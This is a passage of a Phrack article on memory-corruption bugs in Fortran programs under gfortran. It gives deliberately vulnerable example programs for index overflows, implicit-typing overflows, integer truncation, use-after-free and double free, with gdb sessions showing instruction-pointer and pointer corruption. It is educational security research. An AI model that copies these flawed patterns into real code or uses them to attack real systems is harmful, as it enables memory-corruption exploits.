Title : Exploiting Memory Corruptions in Fortran Programs Under Unix/VMS
Author : Magma
==Phrack Inc.==
Volume 0x0e, Issue 0x43, Phile #0x0b of 0x10
|=-----------------------------------------------------------------------=|
|=--------=[ Exploiting memory corruptions in Fortran programs ]=--------=|
|=--------=[ under UNIX/VMS ]=--------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ by Magma /FHC ]=--------------------------=|
|=------------------------=[ [email protected] ]=-------------------------=|
|=-----------------------------------------------------------------------=|
---
"aka hacking Fortran for kiddos"
---
--[ Contents
1 - Introduction
1.1 - A Fortran tale
1.2 - Who cares about Fortran anyway?
2 - A short introduction to the language basics
2.1 - An overview of Fortran syntax
2.2 - Hey Gramps, what's the difference between F77 and F2008?
3 - Memory corruption with gfortran
3.1 - Buffer overflows
3.2 - The number-related issues
3.3 - The POINTER abuse
3.4 - Other interesting bugs
4 - Back to the good ol' OpenVMS friend
4.1 - Common Fortran bugs .VS. OpenVMS
4.2 - Playing with the heap
5 - Prevention: lets use a condom
6 - The final words
7 - Greetz
8 - Bibliography
---
---[ 1 - Introduction
---[ 1.1 - A Fortran tale
Fortran -FORmula TRANslation- is one of the oldest high level programming
language ever created. Being well aware of the fact that youngsters aren't
interested anymore in history, I'll go straight to the point.
Fortran is .NOT. (yet) dead (though 'perforated cards' hackers probably
are). Not only did it remain actively used in the very underground
scientific/banking sectors but it also evolved to the point where it got
its last update in 2008. Hey son, you didn't know that, did you?
Now if you ever took Fortran classes in college/university then there is a
good chance that your teacher voluntary missed a few things as Fortran is
generally taught as a procedural programming language for beginners. As
such, you might have been asked to program some crappy math oriented
program with basic features and never really got the chance to play with
the interesting features of the language.
Fortran was once an old fashioned language with limited features and boring
syntax constraints. Forget about all that. Nowadays Fortran includes modern
features such as dynamic allocation and MPI which make it suitable for
implementing both complex algorithms and parallel computing. Now add that
to the fact that modern compilers exist for almost all common operating
systems and that they produce high-lol-ly efficient code which can be
linked to C and even Java programs. You can also use GTK or OpenGL if you
wish. You're impressed kid, I can see that in your eyes.
@(*_*)@
---[ 1.2 - Who cares about Fortran anyway?
Well I do and let me tell you why you should too:
a. It may not be too good looking at first but at least it's way sexier
than COBOL.
b. Your father was programming in Fortran using perforated cards and got
headaches doing so. Sounds like a cool subject in family diner.
c. Vintage web is the best. Just try typing Fortran in google to admire
beautiful and authentic Web 0.1 HTML.
d. Wikipedia tells us that "It is one of the most popular languages in
the area of high-performance computing and is the language used for
programs that benchmark and rank the world's fastest supercomputers."
We should always believe wikipedia.
e. You mastered tabs in python and couldn't think of new ways to be cool
on BBS^H^H^HIRC? Well then try to master Fortran 77's indentation
constraints. You might even be able to impress chicks. It used to
work almost forty years ago (.OR. .NOT.).
Still not convinced? OK so what if Fortran programs were used in strategic
areas you've only heard of? What if Fortran programs were more buggy [R1]
than they seemed? What if you could exploit some appropriate bug in a
Fortran program and then own the _whole_ _damn_ _world_? That would be
extraordinary, wouldn't it? Well cool down man that would also remain a
dream :>
---
---[ 2 - A short introduction to the language basics
In order to properly understand the paper, you'll need the basics in
Fortran programming. Since Fortran 77 (F77) isn't used anymore, the article
is focused on F90 (Fortran 90) whose syntax mostly remained compatible
throughout the different revisions of the standard. Specific features added
by Fortran 95 (F95) up to Fortran 2008 (F2008) are discussed in Chap 2.2
though not really _that_ interesting in the context of this paper. You can
easily skip the aforementioned explanation.
---[ 2.1 - An overview of Fortran syntax
Fortran is a procedural compiled language whose syntax is quite easy to
learn albeit sometimes not intuitive. Let's begin with the traditional
'Hello World':
-----BEGIN EXAMPLE 1-----
$ cat ex1.f90
! Dummy comment
PROGRaM EX1 [L1]
CHARACTER(len=20) :: hellostr='Hello World!' [L2]
write(*,fmt='(A)') hellOstr [L3]
END PROGRAM [L4]
$ gfortran ex1.f90
$ ./a.out
Hello World!
$
-----END EXAMPLE 1-----
*) '!' marks the beginning of a comment.
*) A Fortran program is divided in several blocks. [L1] declares the
beginning of the PROGRAM (the MAIN_() function) and requires the
according 'END' in [L4]. Other types of blocks include FUNCTION and
SUBROUTINE, the difference between them being essentially whether or
not they return a value.
Note: This language keywords are case insensitive as shown in [L1].
*) Variables are declared at the beginning of the blocks and are also
case insensitive ([L2] vs [L3]) and preceded by a type. According to
the ISO standard [R2], F90 defines five intrinsic types being:
INTEGER, REAL, COMPLEX, CHARACTER and LOGICAL.
An intrinsic type can optionally been followed by a 'type parameter'
which can either be 'len' or 'kind'. 'len' allows the programmer to
specify how much bytes is required to store the variable for a
CHARACTER and so is 'kind' for INTEGER, REAL and LOGICAL types.
Contrary to the C language, there is a difference between strings and
character arrays but both are related to the CHARACTER type:
CHARACTER(len=1) :: array(20) ! 20 bytes array
CHARACTER(len=20) :: string ! 20 bytes string
*) read() and write() are the common input/output functions used to read
and write files. Amongst the possible parameter, you can specify how
to format the variable. The code in [L3] is equivalent to the C line:
printf("%s\n", hellOstr);
Now let's see a more advanced example:
-----BEGIN EXAMPLE 2-----
$ cat ex2.f90
SUBROUTINE add(I,J)
IMPLICIT NONE [L1]
INTEGER(2) :: I [L2]
INTEGER(2) :: J
I = I + J
END SUBROUTINE
PROGRAM EX2
CHARACTER(len=20), PARAMETER :: s = & [L3]
'p67 will be the best.'
INTEGER*2 :: I = Z'FF' [L4]
write(*,*) '[1] Before add(), I = ', I
CALL add(I,1)
write(*,*) '[2] After add(), I = ', I
END PROGRAM
$ gfortran ex2.f90
$ ./a.out
[1] Before add(), I = 255
[2] After add(), I = 256 [L5]
$
-----END EXAMPLE 2-----
L1) By default a few variables do not need to be explicitly declared.
According to Chap 5.3 of [R2], variables I to N are integers, while
other variables are typed REAL. The directive 'IMPLICIT NONE'
forbids this behavior and forces the programmer to properly declare
every variable.
L2) I and J are both signed integers stored on 2 bytes ('short' type in
C language).
L3) Lines can be truncated using the '&' special character. PARAMETER is
used to declare the variable as a constant.
L4) You can initialize the variables in base 8 ('O'), 16 ('Z') and even
base 2 ('B').
L5) When calling functions and subroutines (which from an asm point of
view is the same), then arguments are passed by reference contrary
to the C where arguments are passed by value.
---[ 2.2 - Hey Gramps, what's the difference between F77 and F2008?
First of all, know that F77 is not the first Fortran at all but rather the
ancestor of F90. It can be seen as the skeleton of the actual "modern"
language. Decades after decades, the ISO published several revisions of the
language to bring new functionalities while sometimes deleting ones. For us
hackers, there is almost no impact except that the newer the language, the
higher the chance to find bugs thanks to dangerous and misused extensions.
Anyway you should nonetheless be aware of the following -important-
differences between the revisions:
*) Fortran 90 brought the POINTER object and the ability to dynamically
allocate objects. It also made possible the recursion. This
particular feature won't be discussed in this paper.
*) "Varying character strings" appeared in Fortran 95. This interesting
functionality can potentially reduce the risks of bugs induced by the
need to copy a buffer into another one (remember that strings have a
fixed len in Fortran). Fortunately some compilers don't support it
yet (like gfortran) and a lot of programmers aren't even aware of its
existence.
*) Fortran 2003 was designed to allow object oriented programming but
frankly speaking, we don't care at all. More interesting are the
IEEE floating point arithmetic and the so-called procedure pointers.
Note that we had to wait 2003 to get a language being able to deal
with command line arguments and environment variables. _ridiculous_
*) Fortran 2008 introduced the parallel processing ability in the
language. This will not discussed.
OK enough with the chitchat, let's move on.
---
---[ 3 - Memory corruption with gfortran
This part introduces the more common bugs that you may encounter while
auditing/writing Fortran code. While it is essentially focused on gfortran
(a GCC extension [R3]), the OpenVMS Fortran compiler [R4] will be discussed
in part 4. This will allow us to make at least partial generalisation of
what kind of bugs are likely to be found & exploited in the wild.
People accustomed to Fortran programming already know that Fortran is about
dealing with numbers (one of the main advantages of Fortran). As a result
it seems that interesting inputs will be the ones related to number
manipulation/conversion and string parsing. Now Gramps will show you a few
things that might interest you.
---[ 3.1 - Buffer overflows
Obviously the buffer overflow is the first type of bug that comes to mind
when one wants to trigger a bug related to strings/buffers. Luckily, they
also exist in Fortran but only in situations where the compiler was not
able to deter them. That would be:
*) when the user is able to manipulate an index which will be used to
access an array or a string. Due to the index provided by the user,
the compiler is not able to detect the potential memory corruptions
during the compilation.
*) when the user is implicitly or explicitly changing the type of an
object passed by reference to the function.
The index manipulation
----------------------
Contrary to other languages, Fortran is not able to properly handle invalid
memory access on runtime. In fact, if an index is out of scope, Fortran
will not see it and a memory corruption might appear.
Let's see using this tiny string manipulation example:
-----BEGIN OVERFLOW 1-----
$ cat overflow1.f90
PROGRAM test
CHARACTER(len=30) :: S ! String of length 30
INTEGER(4) I
S = 'Hello Phrack readers!'
read(*,*) I
S(I:I) = '.'
write(*,*) S
END PROGRAM
$ gfortran overflow1.f90
$ ./a.out
3
He.lo Phrack readers! <-- S was modified with 0x2E
$ gdb ./a.out
[...]
0x080487be <+186>: mov BYTE PTR [ebp+eax*1-0x2b],0x2e
; This is the memory write
; Do we really control eax?
[...]
(gdb) b *0x080487be
Breakpoint 1 at 0x80487be
(gdb) r
Starting program: a.out
50 <-- 50 is clearly out of scope! (>30)
Breakpoint 1, 0x080487be in MAIN__ ()
(gdb) print /d $eax
$1 = 50
(gdb) c
Hello Phrack readers!
Program received signal SIGSEGV, Segmentation fault.
0x2e04885b in ?? () <-- EIP was corrupted with 0x2E
-----END OVERFLOW 1-----
This short example is sufficient to prove that (at least with gfortran)
there is no runtime check at all. If the user is controlling the index used
to access a string then it's probably all over. There are two things worth
to note:
*) We tricked an out-of-bound memory write due to string manipulation
but this could very well have been the same thing with any array
(REAL, INTEGERS, CHARACTERS, etc.)
*) Due to the fact that the INTEGER type is 'signed', we are equally
able to write both before and after the buffer. Depending on the
situation this might be extremely useful. For example while it's
usually more interesting to write past the buffer when it's located
on the stack, writing before it (underflow) might be handy when it's
located on the heap. Of course that will depend on the situation.
Explicit typing of function parameters
------------------------------------
A short example is better than confusing explanations:
-----BEGIN CAST 1-----
$ cat cast1.f90
SUBROUTINE dump(S)
INTEGER(4) :: S
write(*,fmt='(Z10)') S
END SUBROUTINE
PROGRAM CAST
CHARACTER(len=6) :: S
S='ABCDEF'
CALL dump(S)
END PROGRAM
$ gfortran cast1.f90
$ ./a.out
44434241
-----END CAST 1-----
So we first declare S as a string in the MAIN_ and then call the dump()
subroutine, S being the argument. Inside dump(), the parameter is declared
as an INTEGER which results in the appropriate printing. The fact that the
compiler doesn't check types can lead to very interesting situations:
*) when the size of S object in dump() is known at compile time and
different of the original one.
*) when the size of S object in dump() is controlled by the user.
The first case will lead to a memory corruption if the size of the argument
in the function is superior to its real size due to argument being passed
by reference. The following code is for example incorrect and will lead to
a program crash:
-----BEGIN CAST 2-----
$ cat cast2.f90
SUBROUTINE dump(S)
CHARACTER(len=20) :: S
S = 'AAAA'
END SUBROUTINE
PROGRAM cast2
CHARACTER(len=10) :: X
X = 'ZZZZZZZZZZZ'
CALL dump(X)
END PROGRAM
$ gfortran ./cast2.f90
$ ./a.out
Segmentation fault
-----END CAST 2-----
What's happening? 'AAAA' is supposed to be shorter than 'ZZZZZZZZZZZ' so
why is there a crash? Well S = 'AAAA' means the initialisation of S which
ultimately results in the 4 first characters being set to 'A' and the other
16 ones to ' ' (space).
But remember that parameters are passed by reference in Fortran so whatever
the size of S during the execution of dump(), the size of the real object
is 10 bytes. In other words, 20 bytes were copied on a 10 bytes buffer. Due
to the very nature of this bug, it's quite unlikely to find it in the wild.
However a much more vicious variant with 'implicit typing' is described
later.
Note: If the size of the argument in the function is actually shorter and
number-related then it may leads to a truncation bug (discussed in Chap
3.2).
Now one could imagine a second case where the programmer is providing the
size of S as an argument (which is of course a bad practice in Fortran).
The following code is perfectly legal:
-----BEGIN CAST 3-----
$ cat cast3.f90
SUBROUTINE dump(S,L)
INTEGER(4) :: L
CHARACTER(len=L) :: S ! size is a runtime parameter
S='AAAA'
END SUBROUTINE
PROGRAM cast2
CHARACTER(len=10) :: X
X = 'ZZZZZZZZZZ'
CALL dump(X,100)
write(*,*) X
END PROGRAM
$ gfortran cast3.f90
$ ./a.out
10
AAAA
$ ./a.out
200
AAAA
Segmentation fault
$
-----END CAST 3-----
For a couple of seconds we could be tempted to think that it's a situation
similar to the one described in [R5] but that would only be true if there
were a stack allocation. In fact once again the bug is triggered by the
initialisation of the string. Because of the explicit typing of S, the
compiler is assuming that S really has a len of L and if L > 10 then a
memory corruption occurs.
Implicit typing
---------------
In the life-time of a program, declaring variables every time can be boring
especially when the use of these variables is limited (consider a DO loop
variable for example). Because of that, Fortran designers created a rule of
implicit declaration. As a result in Fortran you can use a few variables
without declaring them which for us hackers can be really cool as it can
have side effects. Here is a tiny buggy example:
-----BEGIN IMPLICIT TYPE 1-----
$ cat implicit_typing1.f90
SUBROUTINE set(I)
write(*,*) 'How much do u want to read dude ?'
read(*,*) I [L3]
END SUBROUTINE
PROGRAM IMPLICIT_TYPING
IMPLICIT NONE
INTEGER(1) :: A, B [L1]
A = 0
B = 0
CALL set(B) [L2]
write(*,*) 'A=',A,'B=',B
END PROGRAM
$ gfortran implicit_typing1.f90
$ ./a.out
How much do u want to read dude ?
1094795585 [L4]
A= 65 B= 65 [L5]
$
-----END IMPLICIT TYPE 1-----
A, B are declared INTEGERS in the range [-128,+127] [L1] and initialized.
B is then passed by reference to the set() subroutine [L2] where it gets
affected a new value [L3]. If the user supplies a large enough integer [L4]
then B is corrupted [L5]. What happened?
Well the heart of this corruption lies in the implicit typing associated
with the implicit declaration. Here is what can be read from the official
documentation [R2]:
---
Chap 5.3 - IMPLICIT
"In each scoping unit, there is a mapping, which may be null, between each
of the letters A, B, ..., Z and a type (and type parameters). An IMPLICIT
statement specifies the mapping for the letters in its letter-spec-list.
IMPLICIT NONE specifies the null mapping for all the letters. If a mapping
is not specified for a letter, the default for a program unit or an
interface body is default integer if the letter is I, J, ..., or N and
default real otherwise, and the default for an internal or module procedure
is the mapping in the host scoping unit."
---
So not declaring I in the set() subroutine had the effect of declaring it
as an integer which means INTEGER(4) by default (thus 4 bytes allocated).
So cool. Do not forget that we're passing arguments by reference! Yes I
know, I'm repeating myself. Probably because of my Alzheimer you know.
Anyway, It's really easy to watch it
-----BEGIN IMPLICIT TYPE 2-----
(gdb) disassemble MAIN__
[...]
0x080486c1 <+17>: lea esi,[ebp-0xa] ; esi=&B
[...]
0x080486d8 <+40>: mov DWORD PTR [esp],esi
0x080486db <+43>: mov BYTE PTR [ebp-0x9],0x0 ; A=0
0x080486df <+47>: mov BYTE PTR [ebp-0xa],0x0 ; B=0
0x080486e3 <+51>: call 0x8048790 <set_> ; set(&B)
(gdb) disassemble set_
[...]
0x08048826 <+150>: mov eax,DWORD PTR [ebp+0x8] ; eax=&B
0x08048829 <+153>: mov DWORD PTR [esp],ebx
0x0804882c <+156>: mov DWORD PTR [esp+0x8],0x4
0x08048834 <+164>: mov DWORD PTR [esp+0x4],eax
0x08048838 <+168>: call 0x8048594 [...] ; read(&B,4)
[...]
(gdb) b *0x080486e3
Breakpoint 1 at 0x80486e3
(gdb) r
[...]
Breakpoint 1, 0x080486e3 in MAIN__ ()
(gdb) x /x $ebp-0xa
0xbffff42e: 0xf5140000
(gdb) x /x $ebp-0xa+2
0xbffff430: 0xbffff514 <-- A pointer is stored right after B
(gdb) nexti
How much do u want to read dude ?
1094795585
0x080486e8 in MAIN__ ()
(gdb) x /x $ebp-0xa
0xbffff42e: 0x41414141 <-- We are controling &B[0] up to
&B[3]
(gdb) x /x $ebp-0xa+2
0xbffff430: 0xbfff4141 <-- The pointer is corrupted. Our win.
[...]
-----END IMPLICIT TYPE 2-----
As expected we wrote 4 bytes in a 1-byte buffer overwriting both 'B' and
the 2 lowest bytes of a pointer with arbitrary values.
---[ 3.2 - The number-related issues
In C language, there exists three types of integer related bugs [R6]:
1. Signedness bugs
2. Truncation bugs
3. Integer underflow/overflow bugs
What about in Fortran?
*) This first class of bugs is quite unlikely as the primary component
is missing. Indeed the 'unsigned' concept does not exist in Fortran
which means that there is (as far as I can see) almost no way to
mistakenly interpret a negative number (integer/real) as a larger
than expected positive one.
However what would appen if we were to call a function in another
language defining unsigned numbers like C? Then an integer overflow
_could_ happen if the argument was casted. This particular situation
is illustrated in Chap 4.
*) A truncation bug (may) occur when an integer variable is copied into
a smaller one. For example, in C copying an int (4 bytes) into a
short (2 bytes) which is possible in Fortran.
Practically speaking such a bug usually occurs when an INTEGER is
passed as an argument to a function/procedure which declares its type
'smaller' than it actually is.
-----BEGIN TRUNCATE 1-----
$ cat truncate3.f90
LOGICAL FUNCTION IsGood(L)
INTEGER(1) :: L
IsGood = .TRUE.
write(*,*) 'IsGood: size is ', L
IF (L > 10) THEN
write(*,*) 'Way too long man', L
IsGood = .FALSE.
RETURN
END IF
END FUNCTION
PROGRAM truncate3
IMPLICIT NONE
INTEGER(4) :: l
CHARACTER(2000) :: str
LOGICAL :: IsGood
write(*,*) 'Give me the damn string ...'
read(*,*) str
l = len_trim(str)
write(*,*) 'MAIN_: size is ', l
IF (IsGood(l) .EQV. .TRUE.) THEN
write(*,*) 'Copying bytes ... :)'
END IF
END PROGRAM
$ gfortran truncate3.f90
$ ./a.out
Give me the damn string ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
MAIN_: size is 38
IsGood: size is 38
Way too long man 38
$ ./a.out
Give me the damn string ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
MAIN_: size is 520
IsGood: size is 8
Copying bytes ... :)
$
-----END TRUNCATE 1-----
In IsGood(), L is declared as an INTEGER(1). To respect the type, the
parameter has to be reduced modulo 256 hence the result (520 & 0xFF
= 8).
This is _not_ the only situation involving this type of bug. For
example, consider the following situation:
-----BEGIN TRUNCATE 2-----
$ cat truncate2.f90
PROGRAM truncate2
IMPLICIT NONE
INTEGER(1) :: l
CHARACTER(255) :: str
CHARACTER(10) :: foo
write(*,*) 'Give me the damn string ...'
read(*,*) str
write(*,*) 'Real string size is ', len_trim(str)
l = len_trim(str) ! *BUG* *BUG* *BUG*
IF (l > 10) THEN
write(*,*) 'Way too long man', l
STOP
END IF
write(*,*) 'Copying bytes'
! Insecure copy(foo, str)
[...]
END PROGRAM
$ gfortran truncate2.f90
$ ./a.out
Give me the damn string ...
AAAAAAAAAAAAAAAAAA
Real string size is 18
Way too long man 18
$ ./a.out
Give me the damn string ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Real string size is 180
Copying bytes
-----END TRUNCATE 2-----
In this situation, the programmer made a mistake involving the
prototype the len_trim() function (provided by the Fortran API). [R2]
specifies that the result returned by the function should be a
'default integer' (which means INTEGER(4)) hence the previous bug.
*) Whenever a language limits the amount of memory allocated for numbers
(generally because of hardware constraints), a number under/overflow
is always possible and is _normal_. However not handling this
situation _is_ a bug.
Fortran makes no exception as storage is clearly defined:
-----BEGIN INT OVERFLOW 1-----
$ cat arithmetic.f90
[...]
INTEGER(1) :: N1, N2
write(*,*) 'Give me a number (-128, +127) :'
read(*,*) N1
N2 = N1 * 16
write(*,*) 'N * 16 = ', N1*16, ' or ', N2
[...]
$ gfortran arithmetic.f90
$ ./a.out
Give me a number (-128, +127) :
5
N * 16 = 80 or 80
$ ./a.out
Give me a number (-128, +127) :
12
N * 16 = 192 or -64 <-- Oops :)
$ ./a.out
Give me a number (-128, +127) :
18
N * 16 = 288 or 32 <-- Oops (bis) :)
-----END INT OVERFLOW 1-----
Is that all? Not quite son. When auditing the use of numbers in C code,
you're usually focused on integers (char, int, long, long long) and that
would essentially be for two reasons:
*) Floats and double are rarely present in C code or to be fair, usually
not in common 'audited' software. Of course there are a few notable
exceptions, just use your imagination to find out which ones :)
*) Floats are usually _not_ related to copy or allocation operations. In
C, integers might be used as index, offsets, quantities or even sizes
and as such their abuse 'could' induce a memory corruption. There is
almost no such danger with floats.
Now consider that things are a little bit different with Fortran. As I told
you previously Fortran is a math oriented programming language. As such
REAL, and COMPLEX types are really common not to mention the fact that the
language itself provides some nice intrinsic functions to play with. This
itself is sufficient to increase the probability of float-related bug in
real life.
Here is a short example of what could happen:
-----BEGIN REAL OVERFLOW 1-----
$ cat float1.f
PROGRAM float1
REAL :: a, b, x
a = 9.7E-30
b = -3.9E-30
x = a * b
write(*,*) 'x = a*b = ',x
END PROGRAM
$ gfortran ./float1.f
$ ./a.out
x = a*b = -0.0000000
-----END REAL OVERFLOW 1-----
Interesting isn't it? The behavior of REAL is what is described in the
IEEE-754. As a result, a REAL (float) underflow occurs when a and b are
multiplied. This ultimately results in x taking the value 0 because of the
underflow. The program is not able to detect it on runtime whereas an
exception could/should have been generated. I won't say more about that,
now use your brain/imagination/drug to go further ;-)
---[ 3.3 - The POINTER abuse
While the concept of pointer is somewhat universal, implementations and
intrinsic limits of this object may completely vary from a language to
another. For example, while in C you have direct access to the memory, in
Fortran you don't (at least directly). But you still have a powerful
pointer arithmetic and frankly speaking, that's all needs the programmer to
introduce bugs ;-). Now let's talk about the POINTER.
Note: The POINTER is F90 & later specific but you might find pointers in a
few F77 programs which use 'Cray Pointers' [R10].
Introduction to POINTER
-----------------------
In Fortran, a pointer is not a data type but rather a type parameter and
must be associated with an object of the same type to read/modify it.
Here is a short self-explaining example:
-----BEGIN POINTER 1-----
$ cat pointer1.f90
PROGRAM pointer1
INTEGER, TARGET :: a
INTEGER, POINTER :: p_a
p_a => a ! p_a = &a
p_a = 1 ! *p_a = 1
write(*,*) a
a = 2
write(*,*) p_a ! printf("%d",*p_a)
END PROGRAM
$ gfortran pointer1.f90
$ ./a.out
1
2
-----END POINTER 1-----
Note that the TARGET parameter is mandatory. Now let's see a more complete
example:
-----BEGIN POINTER 2-----
$ cat pointer2.f90
PROGRAM pointer2
INTEGER, POINTER :: p_a(:)
INTEGER, POINTER, DIMENSION(:) :: p_b
INTEGER, ALLOCATABLE :: c(:)
INTEGER, POINTER :: X(:)
ALLOCATE(p_a(5)); p_a = 5
ALLOCATE(p_b(4)); p_b = 4
ALLOCATE(c(3)); c = 3
X => p_a
X(3) = 0
write(*,*) p_a
write(*,*) p_b
write(*,*) c
DEALLOCATE(p_a)
DEALLOCATE(p_b)
DEALLOCATE(c)
END PROGRAM
$ gfortran pointer2.f90
$ ./a.out
5 5 0 5 5
4 4 4 4
3 3 3
-----END POINTER 2-----
*) 'p_a' is an integer array pointer.
*) 'p_b' and 'p_a' are the same kind of object despite the syntax being
slightly different (but equivalent in the end).
*) 'c' is an array whose size is still unknown. The ALLOCATABLE
parameter specifies that memory will be requested before any use.
This is a dynamically allocated array.
*) ALLOCATE() is the intrinsic function responsible of the allocation.
(and yes its calling syntax is _shit_ but let's deal with it)
*) DEALLOCATE() will free previously requested memory.
The link between ALLOCATE() and the libc allocator is easy to see:
------------------------------------------------------
$ ltrace -e malloc,free ./a.out
malloc(20) = 0x087009a0
malloc(16) = 0x087009b8
malloc(12) = 0x087009d0
5 5 0 5 5
4 4 4 4
3 3 3
free(0x087009a0) = <void>
free(0x087009b8) = <void>
free(0x087009d0) = <void>
------------------------------------------------------
This alone is sufficient to prove that malloc (respectively free) and
ALLOCATE (respectively DEALLOCATE) are 'almost' the same. The difference
between both is studied in another subsection.
Heap overflows
--------------
A buffer overflow in an ALLOCATEd area _is_ a heap overflow. Such a bug may
occur if:
*) The user is able to manipulate the index used with the array POINTER
to perform an out of bound operation:
------------------------------------------------------
$ ./bof_array_malloc AAAAAAAAAAAAAAAAAAA
INITIAL ARGUMENT = AAAAAAAAAAAAAAAAAAA [ 20 ]
ONCE CLEANED :AAAAAAAAAAAAAAAAAAAA
$ ./bof_array_malloc AAAAAAAAAAAAAAAAAAAA
INITIAL ARGUMENT = AAAAAAAAAAAAAAAAAAAA [ 141 ]
ONCE CLEANED :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA
*** glibc detected *** ./bof_array_malloc: free(): invalid next size [...]
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(+0x6b591)[0xb7625591]
/lib/tls/i686/cmov/libc.so.6(+0x6cde8)[0xb7626de8]
/lib/tls/i686/cmov/libc.so.6(cfree+0x6d)[0xb7629ecd]
[...]
------------------------------------------------------
*) The user is able to somehow induce a bug in the allocation either
exploiting an arithmetic mistake of the behavior of ALLOCATE
(discussed further).
Dangling pointers
-----------------
By default, pointers are undefined when declared. As a result there should
not be any reference nor manipulation of these objects until their
association. The unfamiliar programmer might be tempted to use the
ASSOCIATED() intrinsic function for safety purpose which (un)fortunately is
a mistake:
-----BEGIN POINTER 3-----
$ cat pointer3.f90
PROGRAM pointer1
INTEGER, TARGET :: a
INTEGER, POINTER :: p_a
write(*,*) associated(p_a)
nullify(p_a)
write(*,*) associated(p_a)
p_a => a
write(*,*) associated(p_a)
END PROGRAM
$ gfortran pointer3.f90
$ ./a.out
T <-- *WRONG* :)
F <-- Right
T <-- Right
-----END POINTER 3-----
*) p_a is declared and 'undefined' by default.
*) associated() falsely reports that p_a is associated.
*) Since the pointer is associated, the programmer can perform
operations and a memory corruption is very likely to appear.
Let's try to understand what's happening:
------------------------------------------------------
(gdb) disass MAIN__
Dump of assembler code for function MAIN__:
0x080485d4 <+0>: push ebp
0x080485d5 <+1>: mov ebp,esp
0x080485d7 <+3>: sub esp,0x188
0x080485dd <+9>: mov DWORD PTR [esp+0x4],0x80488a0
0x080485e5 <+17>: mov DWORD PTR [esp],0x8
0x080485ec <+24>: call 0x80484c4 <_gfortran_set_options@plt>
0x080485f1 <+29>: mov DWORD PTR [ebp-0x168],0x8048880
0x080485fb <+39>: mov DWORD PTR [ebp-0x164],0x4
0x08048605 <+49>: mov DWORD PTR [ebp-0x170],0x80
0x0804860f <+59>: mov DWORD PTR [ebp-0x16c],0x6
0x08048619 <+69>: lea eax,[ebp-0x170]
0x0804861f <+75>: mov DWORD PTR [esp],eax
0x08048622 <+78>: call 0x80484e4 <_gfortran_st_write@plt>
0x08048627 <+83>: cmp DWORD PTR [ebp-0xc],0x0 ; p_a == 0 ?
0x0804862b <+87>: setne al ; al = ~(p_a == 0)
0x0804862e <+90>: movzx eax,al ; eax = al
------------------------------------------------------
OK OK easy. First p_a is read on the stack then its value is compared with
0 (NULL). If p_a is not zero then it's supposed associated (ah ah). However
since the local variable is uninitialized, it could take any value and in
our case some stack address thereby explaining the bug.
Now more interesting. If operations are performed using p_a on the base of
the result returned by associated() then an invalid memory dereference may
occur and depending on whether we can control this address or nor it might
end up either as a 'Segmentation Fault' or as a perfectly controlled
arbitrary memory write. I discovered this really interesting issue reading
a cool website [R7] which details a few other interesting issues that won't
be discussed in this paper.
Use-after-free bugs
-------------------
Does the compiler keep track of POINTER object? Will it prevent the
programmer from misusing them? Let's write an example once more:
-----BEGIN POINTER 4-----
$ cat pointer4.f90
PROGRAM pointer4
INTEGER, POINTER :: p1(:)
INTEGER, POINTER :: p2(:)
ALLOCATE(p1(10))
p2 => p1
p2 = 2
DEALLOCATE(p1)
p2 = 3 ! REALLY bad :(
END PROGRAM
$ gfortran pointer4.f90 -O3
$ gdb ./a.out
[...]
(gdb) disassemble MAIN__
[...]
0x080485cb <+27>: mov DWORD PTR [esp],0x28
0x080485d2 <+34>: call 0x80484cc <malloc@plt>
0x080485d7 <+39>: test eax,eax
0x080485d9 <+41>: mov ebx,eax ; p2 => p1
0x080485db <+43>: je 0x8048679 <MAIN__+201>
0x080485e1 <+49>: mov DWORD PTR [eax],0x2
[...]
0x08048626 <+118>: mov DWORD PTR [esp],eax
0x08048629 <+121>: call 0x804849c <free@plt>
0x0804862e <+126>: mov DWORD PTR [ebx],0x3 ; BUG!!!
[...]
-----END POINTER 4-----
So not only does the compiler nothing but still the bug is really there. Oh
man Fortran is just like C after all :) With that in mind, it's rather
obvious that doublefree() are possible and indeed they are:
-----BEGIN DFREE 1-----
$ cat double_free.f90
SUBROUTINE check(x,L)
CHARACTER, TARGET :: x(L)
CHARACTER, POINTER :: p(:)
INTEGER I
p => x
DO I=1,L
IF (ichar(p(I)) .lt. ichar('A')) THEN
goto 100
END IF
IF (ichar(p(I)) .gt. ichar('Z')) THEN
goto 100
END IF
END DO
RETURN
100 write(*,*) '[-] Warning argument is fucked !!!'
DEALLOCATE(p) ! If the argument has an invalid character
! then it's free()ed.
END SUBROUTINE
PROGRAM double_free
[...]
call check(q,realsize)
write(*,*) '[+] First argument is ', q
deallocate(q) ! Second free()
[...]
$ ./double_free ACAAAAAAZ
[+] First argument is ACAAAAAAZ
$ ./double_free ACAAAAAAZ-
[-] Warning argument is fucked !!!
[+] First argument is AAAAZ-
